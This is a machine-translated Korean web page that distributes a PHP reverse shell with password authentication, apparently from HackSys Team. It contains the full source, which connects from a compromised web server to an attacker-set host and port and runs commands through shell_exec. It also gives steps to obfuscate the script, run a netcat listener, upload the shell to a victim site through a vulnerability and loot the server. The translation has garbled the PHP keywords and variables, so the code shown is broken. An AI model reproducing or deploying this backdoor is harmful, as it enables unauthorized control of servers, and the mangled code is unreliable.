쉘 V1.0 PHP 역방향 – 인증 기능
제품 그룹:
Ashfaq 안사
버전:
1.0
가격:
무료

이용 후기:
평가:
5
10월 9, 2012
마지막으로 수정:일월 18, 2013

개요:

붙박이 인증 기능과 함께 PHP 쉘을 연결 반전. 귀하의 백도어를 보호하는 멋진 스크립트.

소개

 

이 도구는 사용자가 업로드 PHP를 실행하는 웹 서버에 액세스 할 수 있습니다 Pentest와 상황을 위해 설계.
웹 루트에 어딘가에이 스크립트를 업로드 한 다음 브라우저에서 해당 URL에 액세스하여이를 실행. 스크립트는 스크립트에 정의 된 호스트 및 포트로 웹 서버에서 아웃 바운드 TCP 연결을 엽니 다. 이 TCP 연결에 바인딩하는 것은 쉘이 될 것입니다.
 

이것은 같은 interective 프로그램을 실행할 수있는 적절한 대화식 쉘이 될 것입니다 텔넷SSH.
이 쉘은 백도어를 남용 다른 사람을 방지 붙박이 인증 기능을 가지고.
그것은 당신이 단일 명령을 보낼 수 있도록하는 웹 폼 기반의 쉘에서 다른, 다음 출력을 리턴.
 

소스를 수정

 

1
2
3
$IP = "127.0.0.1"; #귀하의 공용 IP로 변경
$포트 = 4444;      #여러분의 포트로 변경
$암호 = base64_decode("aGFja3N5c3RlYW0="); #기본 암호: hacksysteam (MD5)

 

당신의 필요와 상황에 따라 값을 변경합니다.
 

소스 당황

 

일단 당신이 수정을 수행 한, 당신은 어떤 온라인 사용할 수 있습니다 PHP 난독 처리기 PHP 스크립트를 인코딩.
 

예: http://www.codeeclipse.com/
 

난독 전, 필요에 따라 위의 값을 변경하십시오.
 

설치 netcat을 수신기

 

웹 서버에서 액세스 할 수있는 호스트 및 포트에서 netcat을 리스너를 시작.
예를 들어, 만약 당신이 리버스 쉘 스크립트에 지정된대로 여기에 동일한 포트를 사용 (4444):
 

1
루트 @ BT:~ # 노스 캐롤라이나 -lvvp 4444

 

스크립트를 업로드하고 실행

 

취약점을 이용하여 웹 사이트에서 당신에 의해 발견, 업로드 reverse_shell.php.
웹 브라우저에서 새로 업로드 된 파일을 검색하여 간단하게 스크립트를 실행.
 

1
HTTP://<피해자 IP>/<업로드 경로>/reverse_shell.php

 

주의: 당신은 웹 페이지의 출력을 볼 수 없습니다, 그것은 대기 모드에서 계속 성공적인 경우.
 

쉘과 약탈

 

소스 코드

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?PHP
###################################################
#               쉘 V1.0 번호를 역방향
#             인증 기능 #
#                                                 #
#            Hacksys 팀 - 표범 #
#             저자: Ashfaq 안사 #
#            hacksysteam@hotmail.com #
#          HTTP://hacksys.vfreaks.com #
#              리눅스 용으로 설계된 #
#             #을 lionaneesh하는 감사
#             lionaneesh@gmail.com #
###################################################

ini_set('max_execution_time을',0);

$버전 = "2.0";
$IP = "127.0.0.1"; #이 설정을 변경
$포트 = 4444;      #이 설정을 변경
$암호 = base64_decode(&quot;aGFja3N5c3RlYW0="); #기본 암호: hacksysteam (MD5)

$기치 = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _` | '_`_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    PHP에서 쉘 역
    저자: Ashfaq 안사
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /\N\N"
);

$PWD = shell_exec("PWD");
$SYSINFO = shell_exec("은 uname-");
$신분증 = shell_exec('ID | "컷 D(" -에프 2 | "컷 D)" -F 1 ');
$날짜 = shell_exec("날짜");
$만 = 1337;
$정보 =
("
시스템 정보:\N$SYSINFO
현재 작업 디렉토리: $PWD
사용자 그룹: $신분증
현재 날짜 및 시간: $날짜\N
"
);

인쇄 "\N에 연결하려고: $IP 포트 $포트 ...\N\N";

$sockfd와 = 하고 fsockopen($IP , $포트 , $errno를, $errstr을 세팅 );

($errno를 != 0)
  {
    인쇄 "\N****** 오류가 발생했습니다 ******\N오류 Nnumber: $errno를\N오류 문자열: $errstr을 세팅\N\N";
    die(0);
  }
그렇지 않으면 (!$sockfd와)
  {
    인쇄 "심각한 : 연결을 시도 할 때 예기치 않은 오류가 발생했습니다!\N";
  }
그렇지 않으면
  {
    인쇄 "에 연결: $IP 포트 $포트 ...\N\N";
    fputs로 ($sockfd와 , $기치);
    fputs로($sockfd와 ,"암호를 입력: ");
    $getpass = 손질(fgets($sockfd와, strlen 함수($암호) + 2));

    ($getpass == $암호)
    {
      fputs로($sockfd와, "\N인증 성공적인..\N");
      fputs로($sockfd와, $정보);
      동안(!EOF($sockfd와))
      {
    $cmdPrompt = 손질($신분증) . "@" . 손질($IP) . ":~" . 손질($PWD) . "# ";
    fputs로 ($sockfd와 , $cmdPrompt );
    $명령 = 손질(fgets($sockfd와, $만));
        (손질($명령) == "종료")
    {
      fputs로($sockfd와 ,"\N사용자에 의해 중단 ... 종료 ..." );
      FCLOSE($sockfd와);
      die(0);
    }
    fputs로($sockfd와 , "\N" . shell_exec($명령) . "\N");
      }
      FCLOSE($sockfd와);
      die(0);
    }
    그렇지 않으면
    {
      fputs로($sockfd와 ,"\N암호가 잘못되었습니다 ... 종료 ...");
      FCLOSE($sockfd와);
      die(0);
    }
  }
?>

 

스크린 샷

 


 

리버스 쉘 V1.0 PHP를 다운로드 – 인증 기능

 

Reverse_Shell_v1.0.zip

 
 
 

21,009 전체보기, 17 조회 수 오늘

다음 두 개의 탭은 아래 내용을 변경.

Ashfaq 안사

보안 연구원
아슈 파크 안사리는의 창시자이다 HackSys 팀 코드 이름 "표범". 그는 정보 보안의 다양한 측면에 경험을 가진 보안 연구원입니다. 그는 저술 "HackSys 익스트림 취약 드라이버" 과 "죽음의 쉘 코드". 그는 또한 작성 및 낮은 수준의 소프트웨어 개발에 대한 다양한 백서를 발표했다. 그의 핵심 관심에있다 "낮은 수준의 착취", "리버스 엔지니어링", "프로그램 분석" 과 "하이브리드 퍼징". 그는 인공 지능과 기계 학습의 팬보이입니다. 그는의 장 리드입니다 널 푸네.

회신을 남겨주

귀하의 이메일 주소는 공개되지 않습니다. 필수 필드는 표시됩니다 *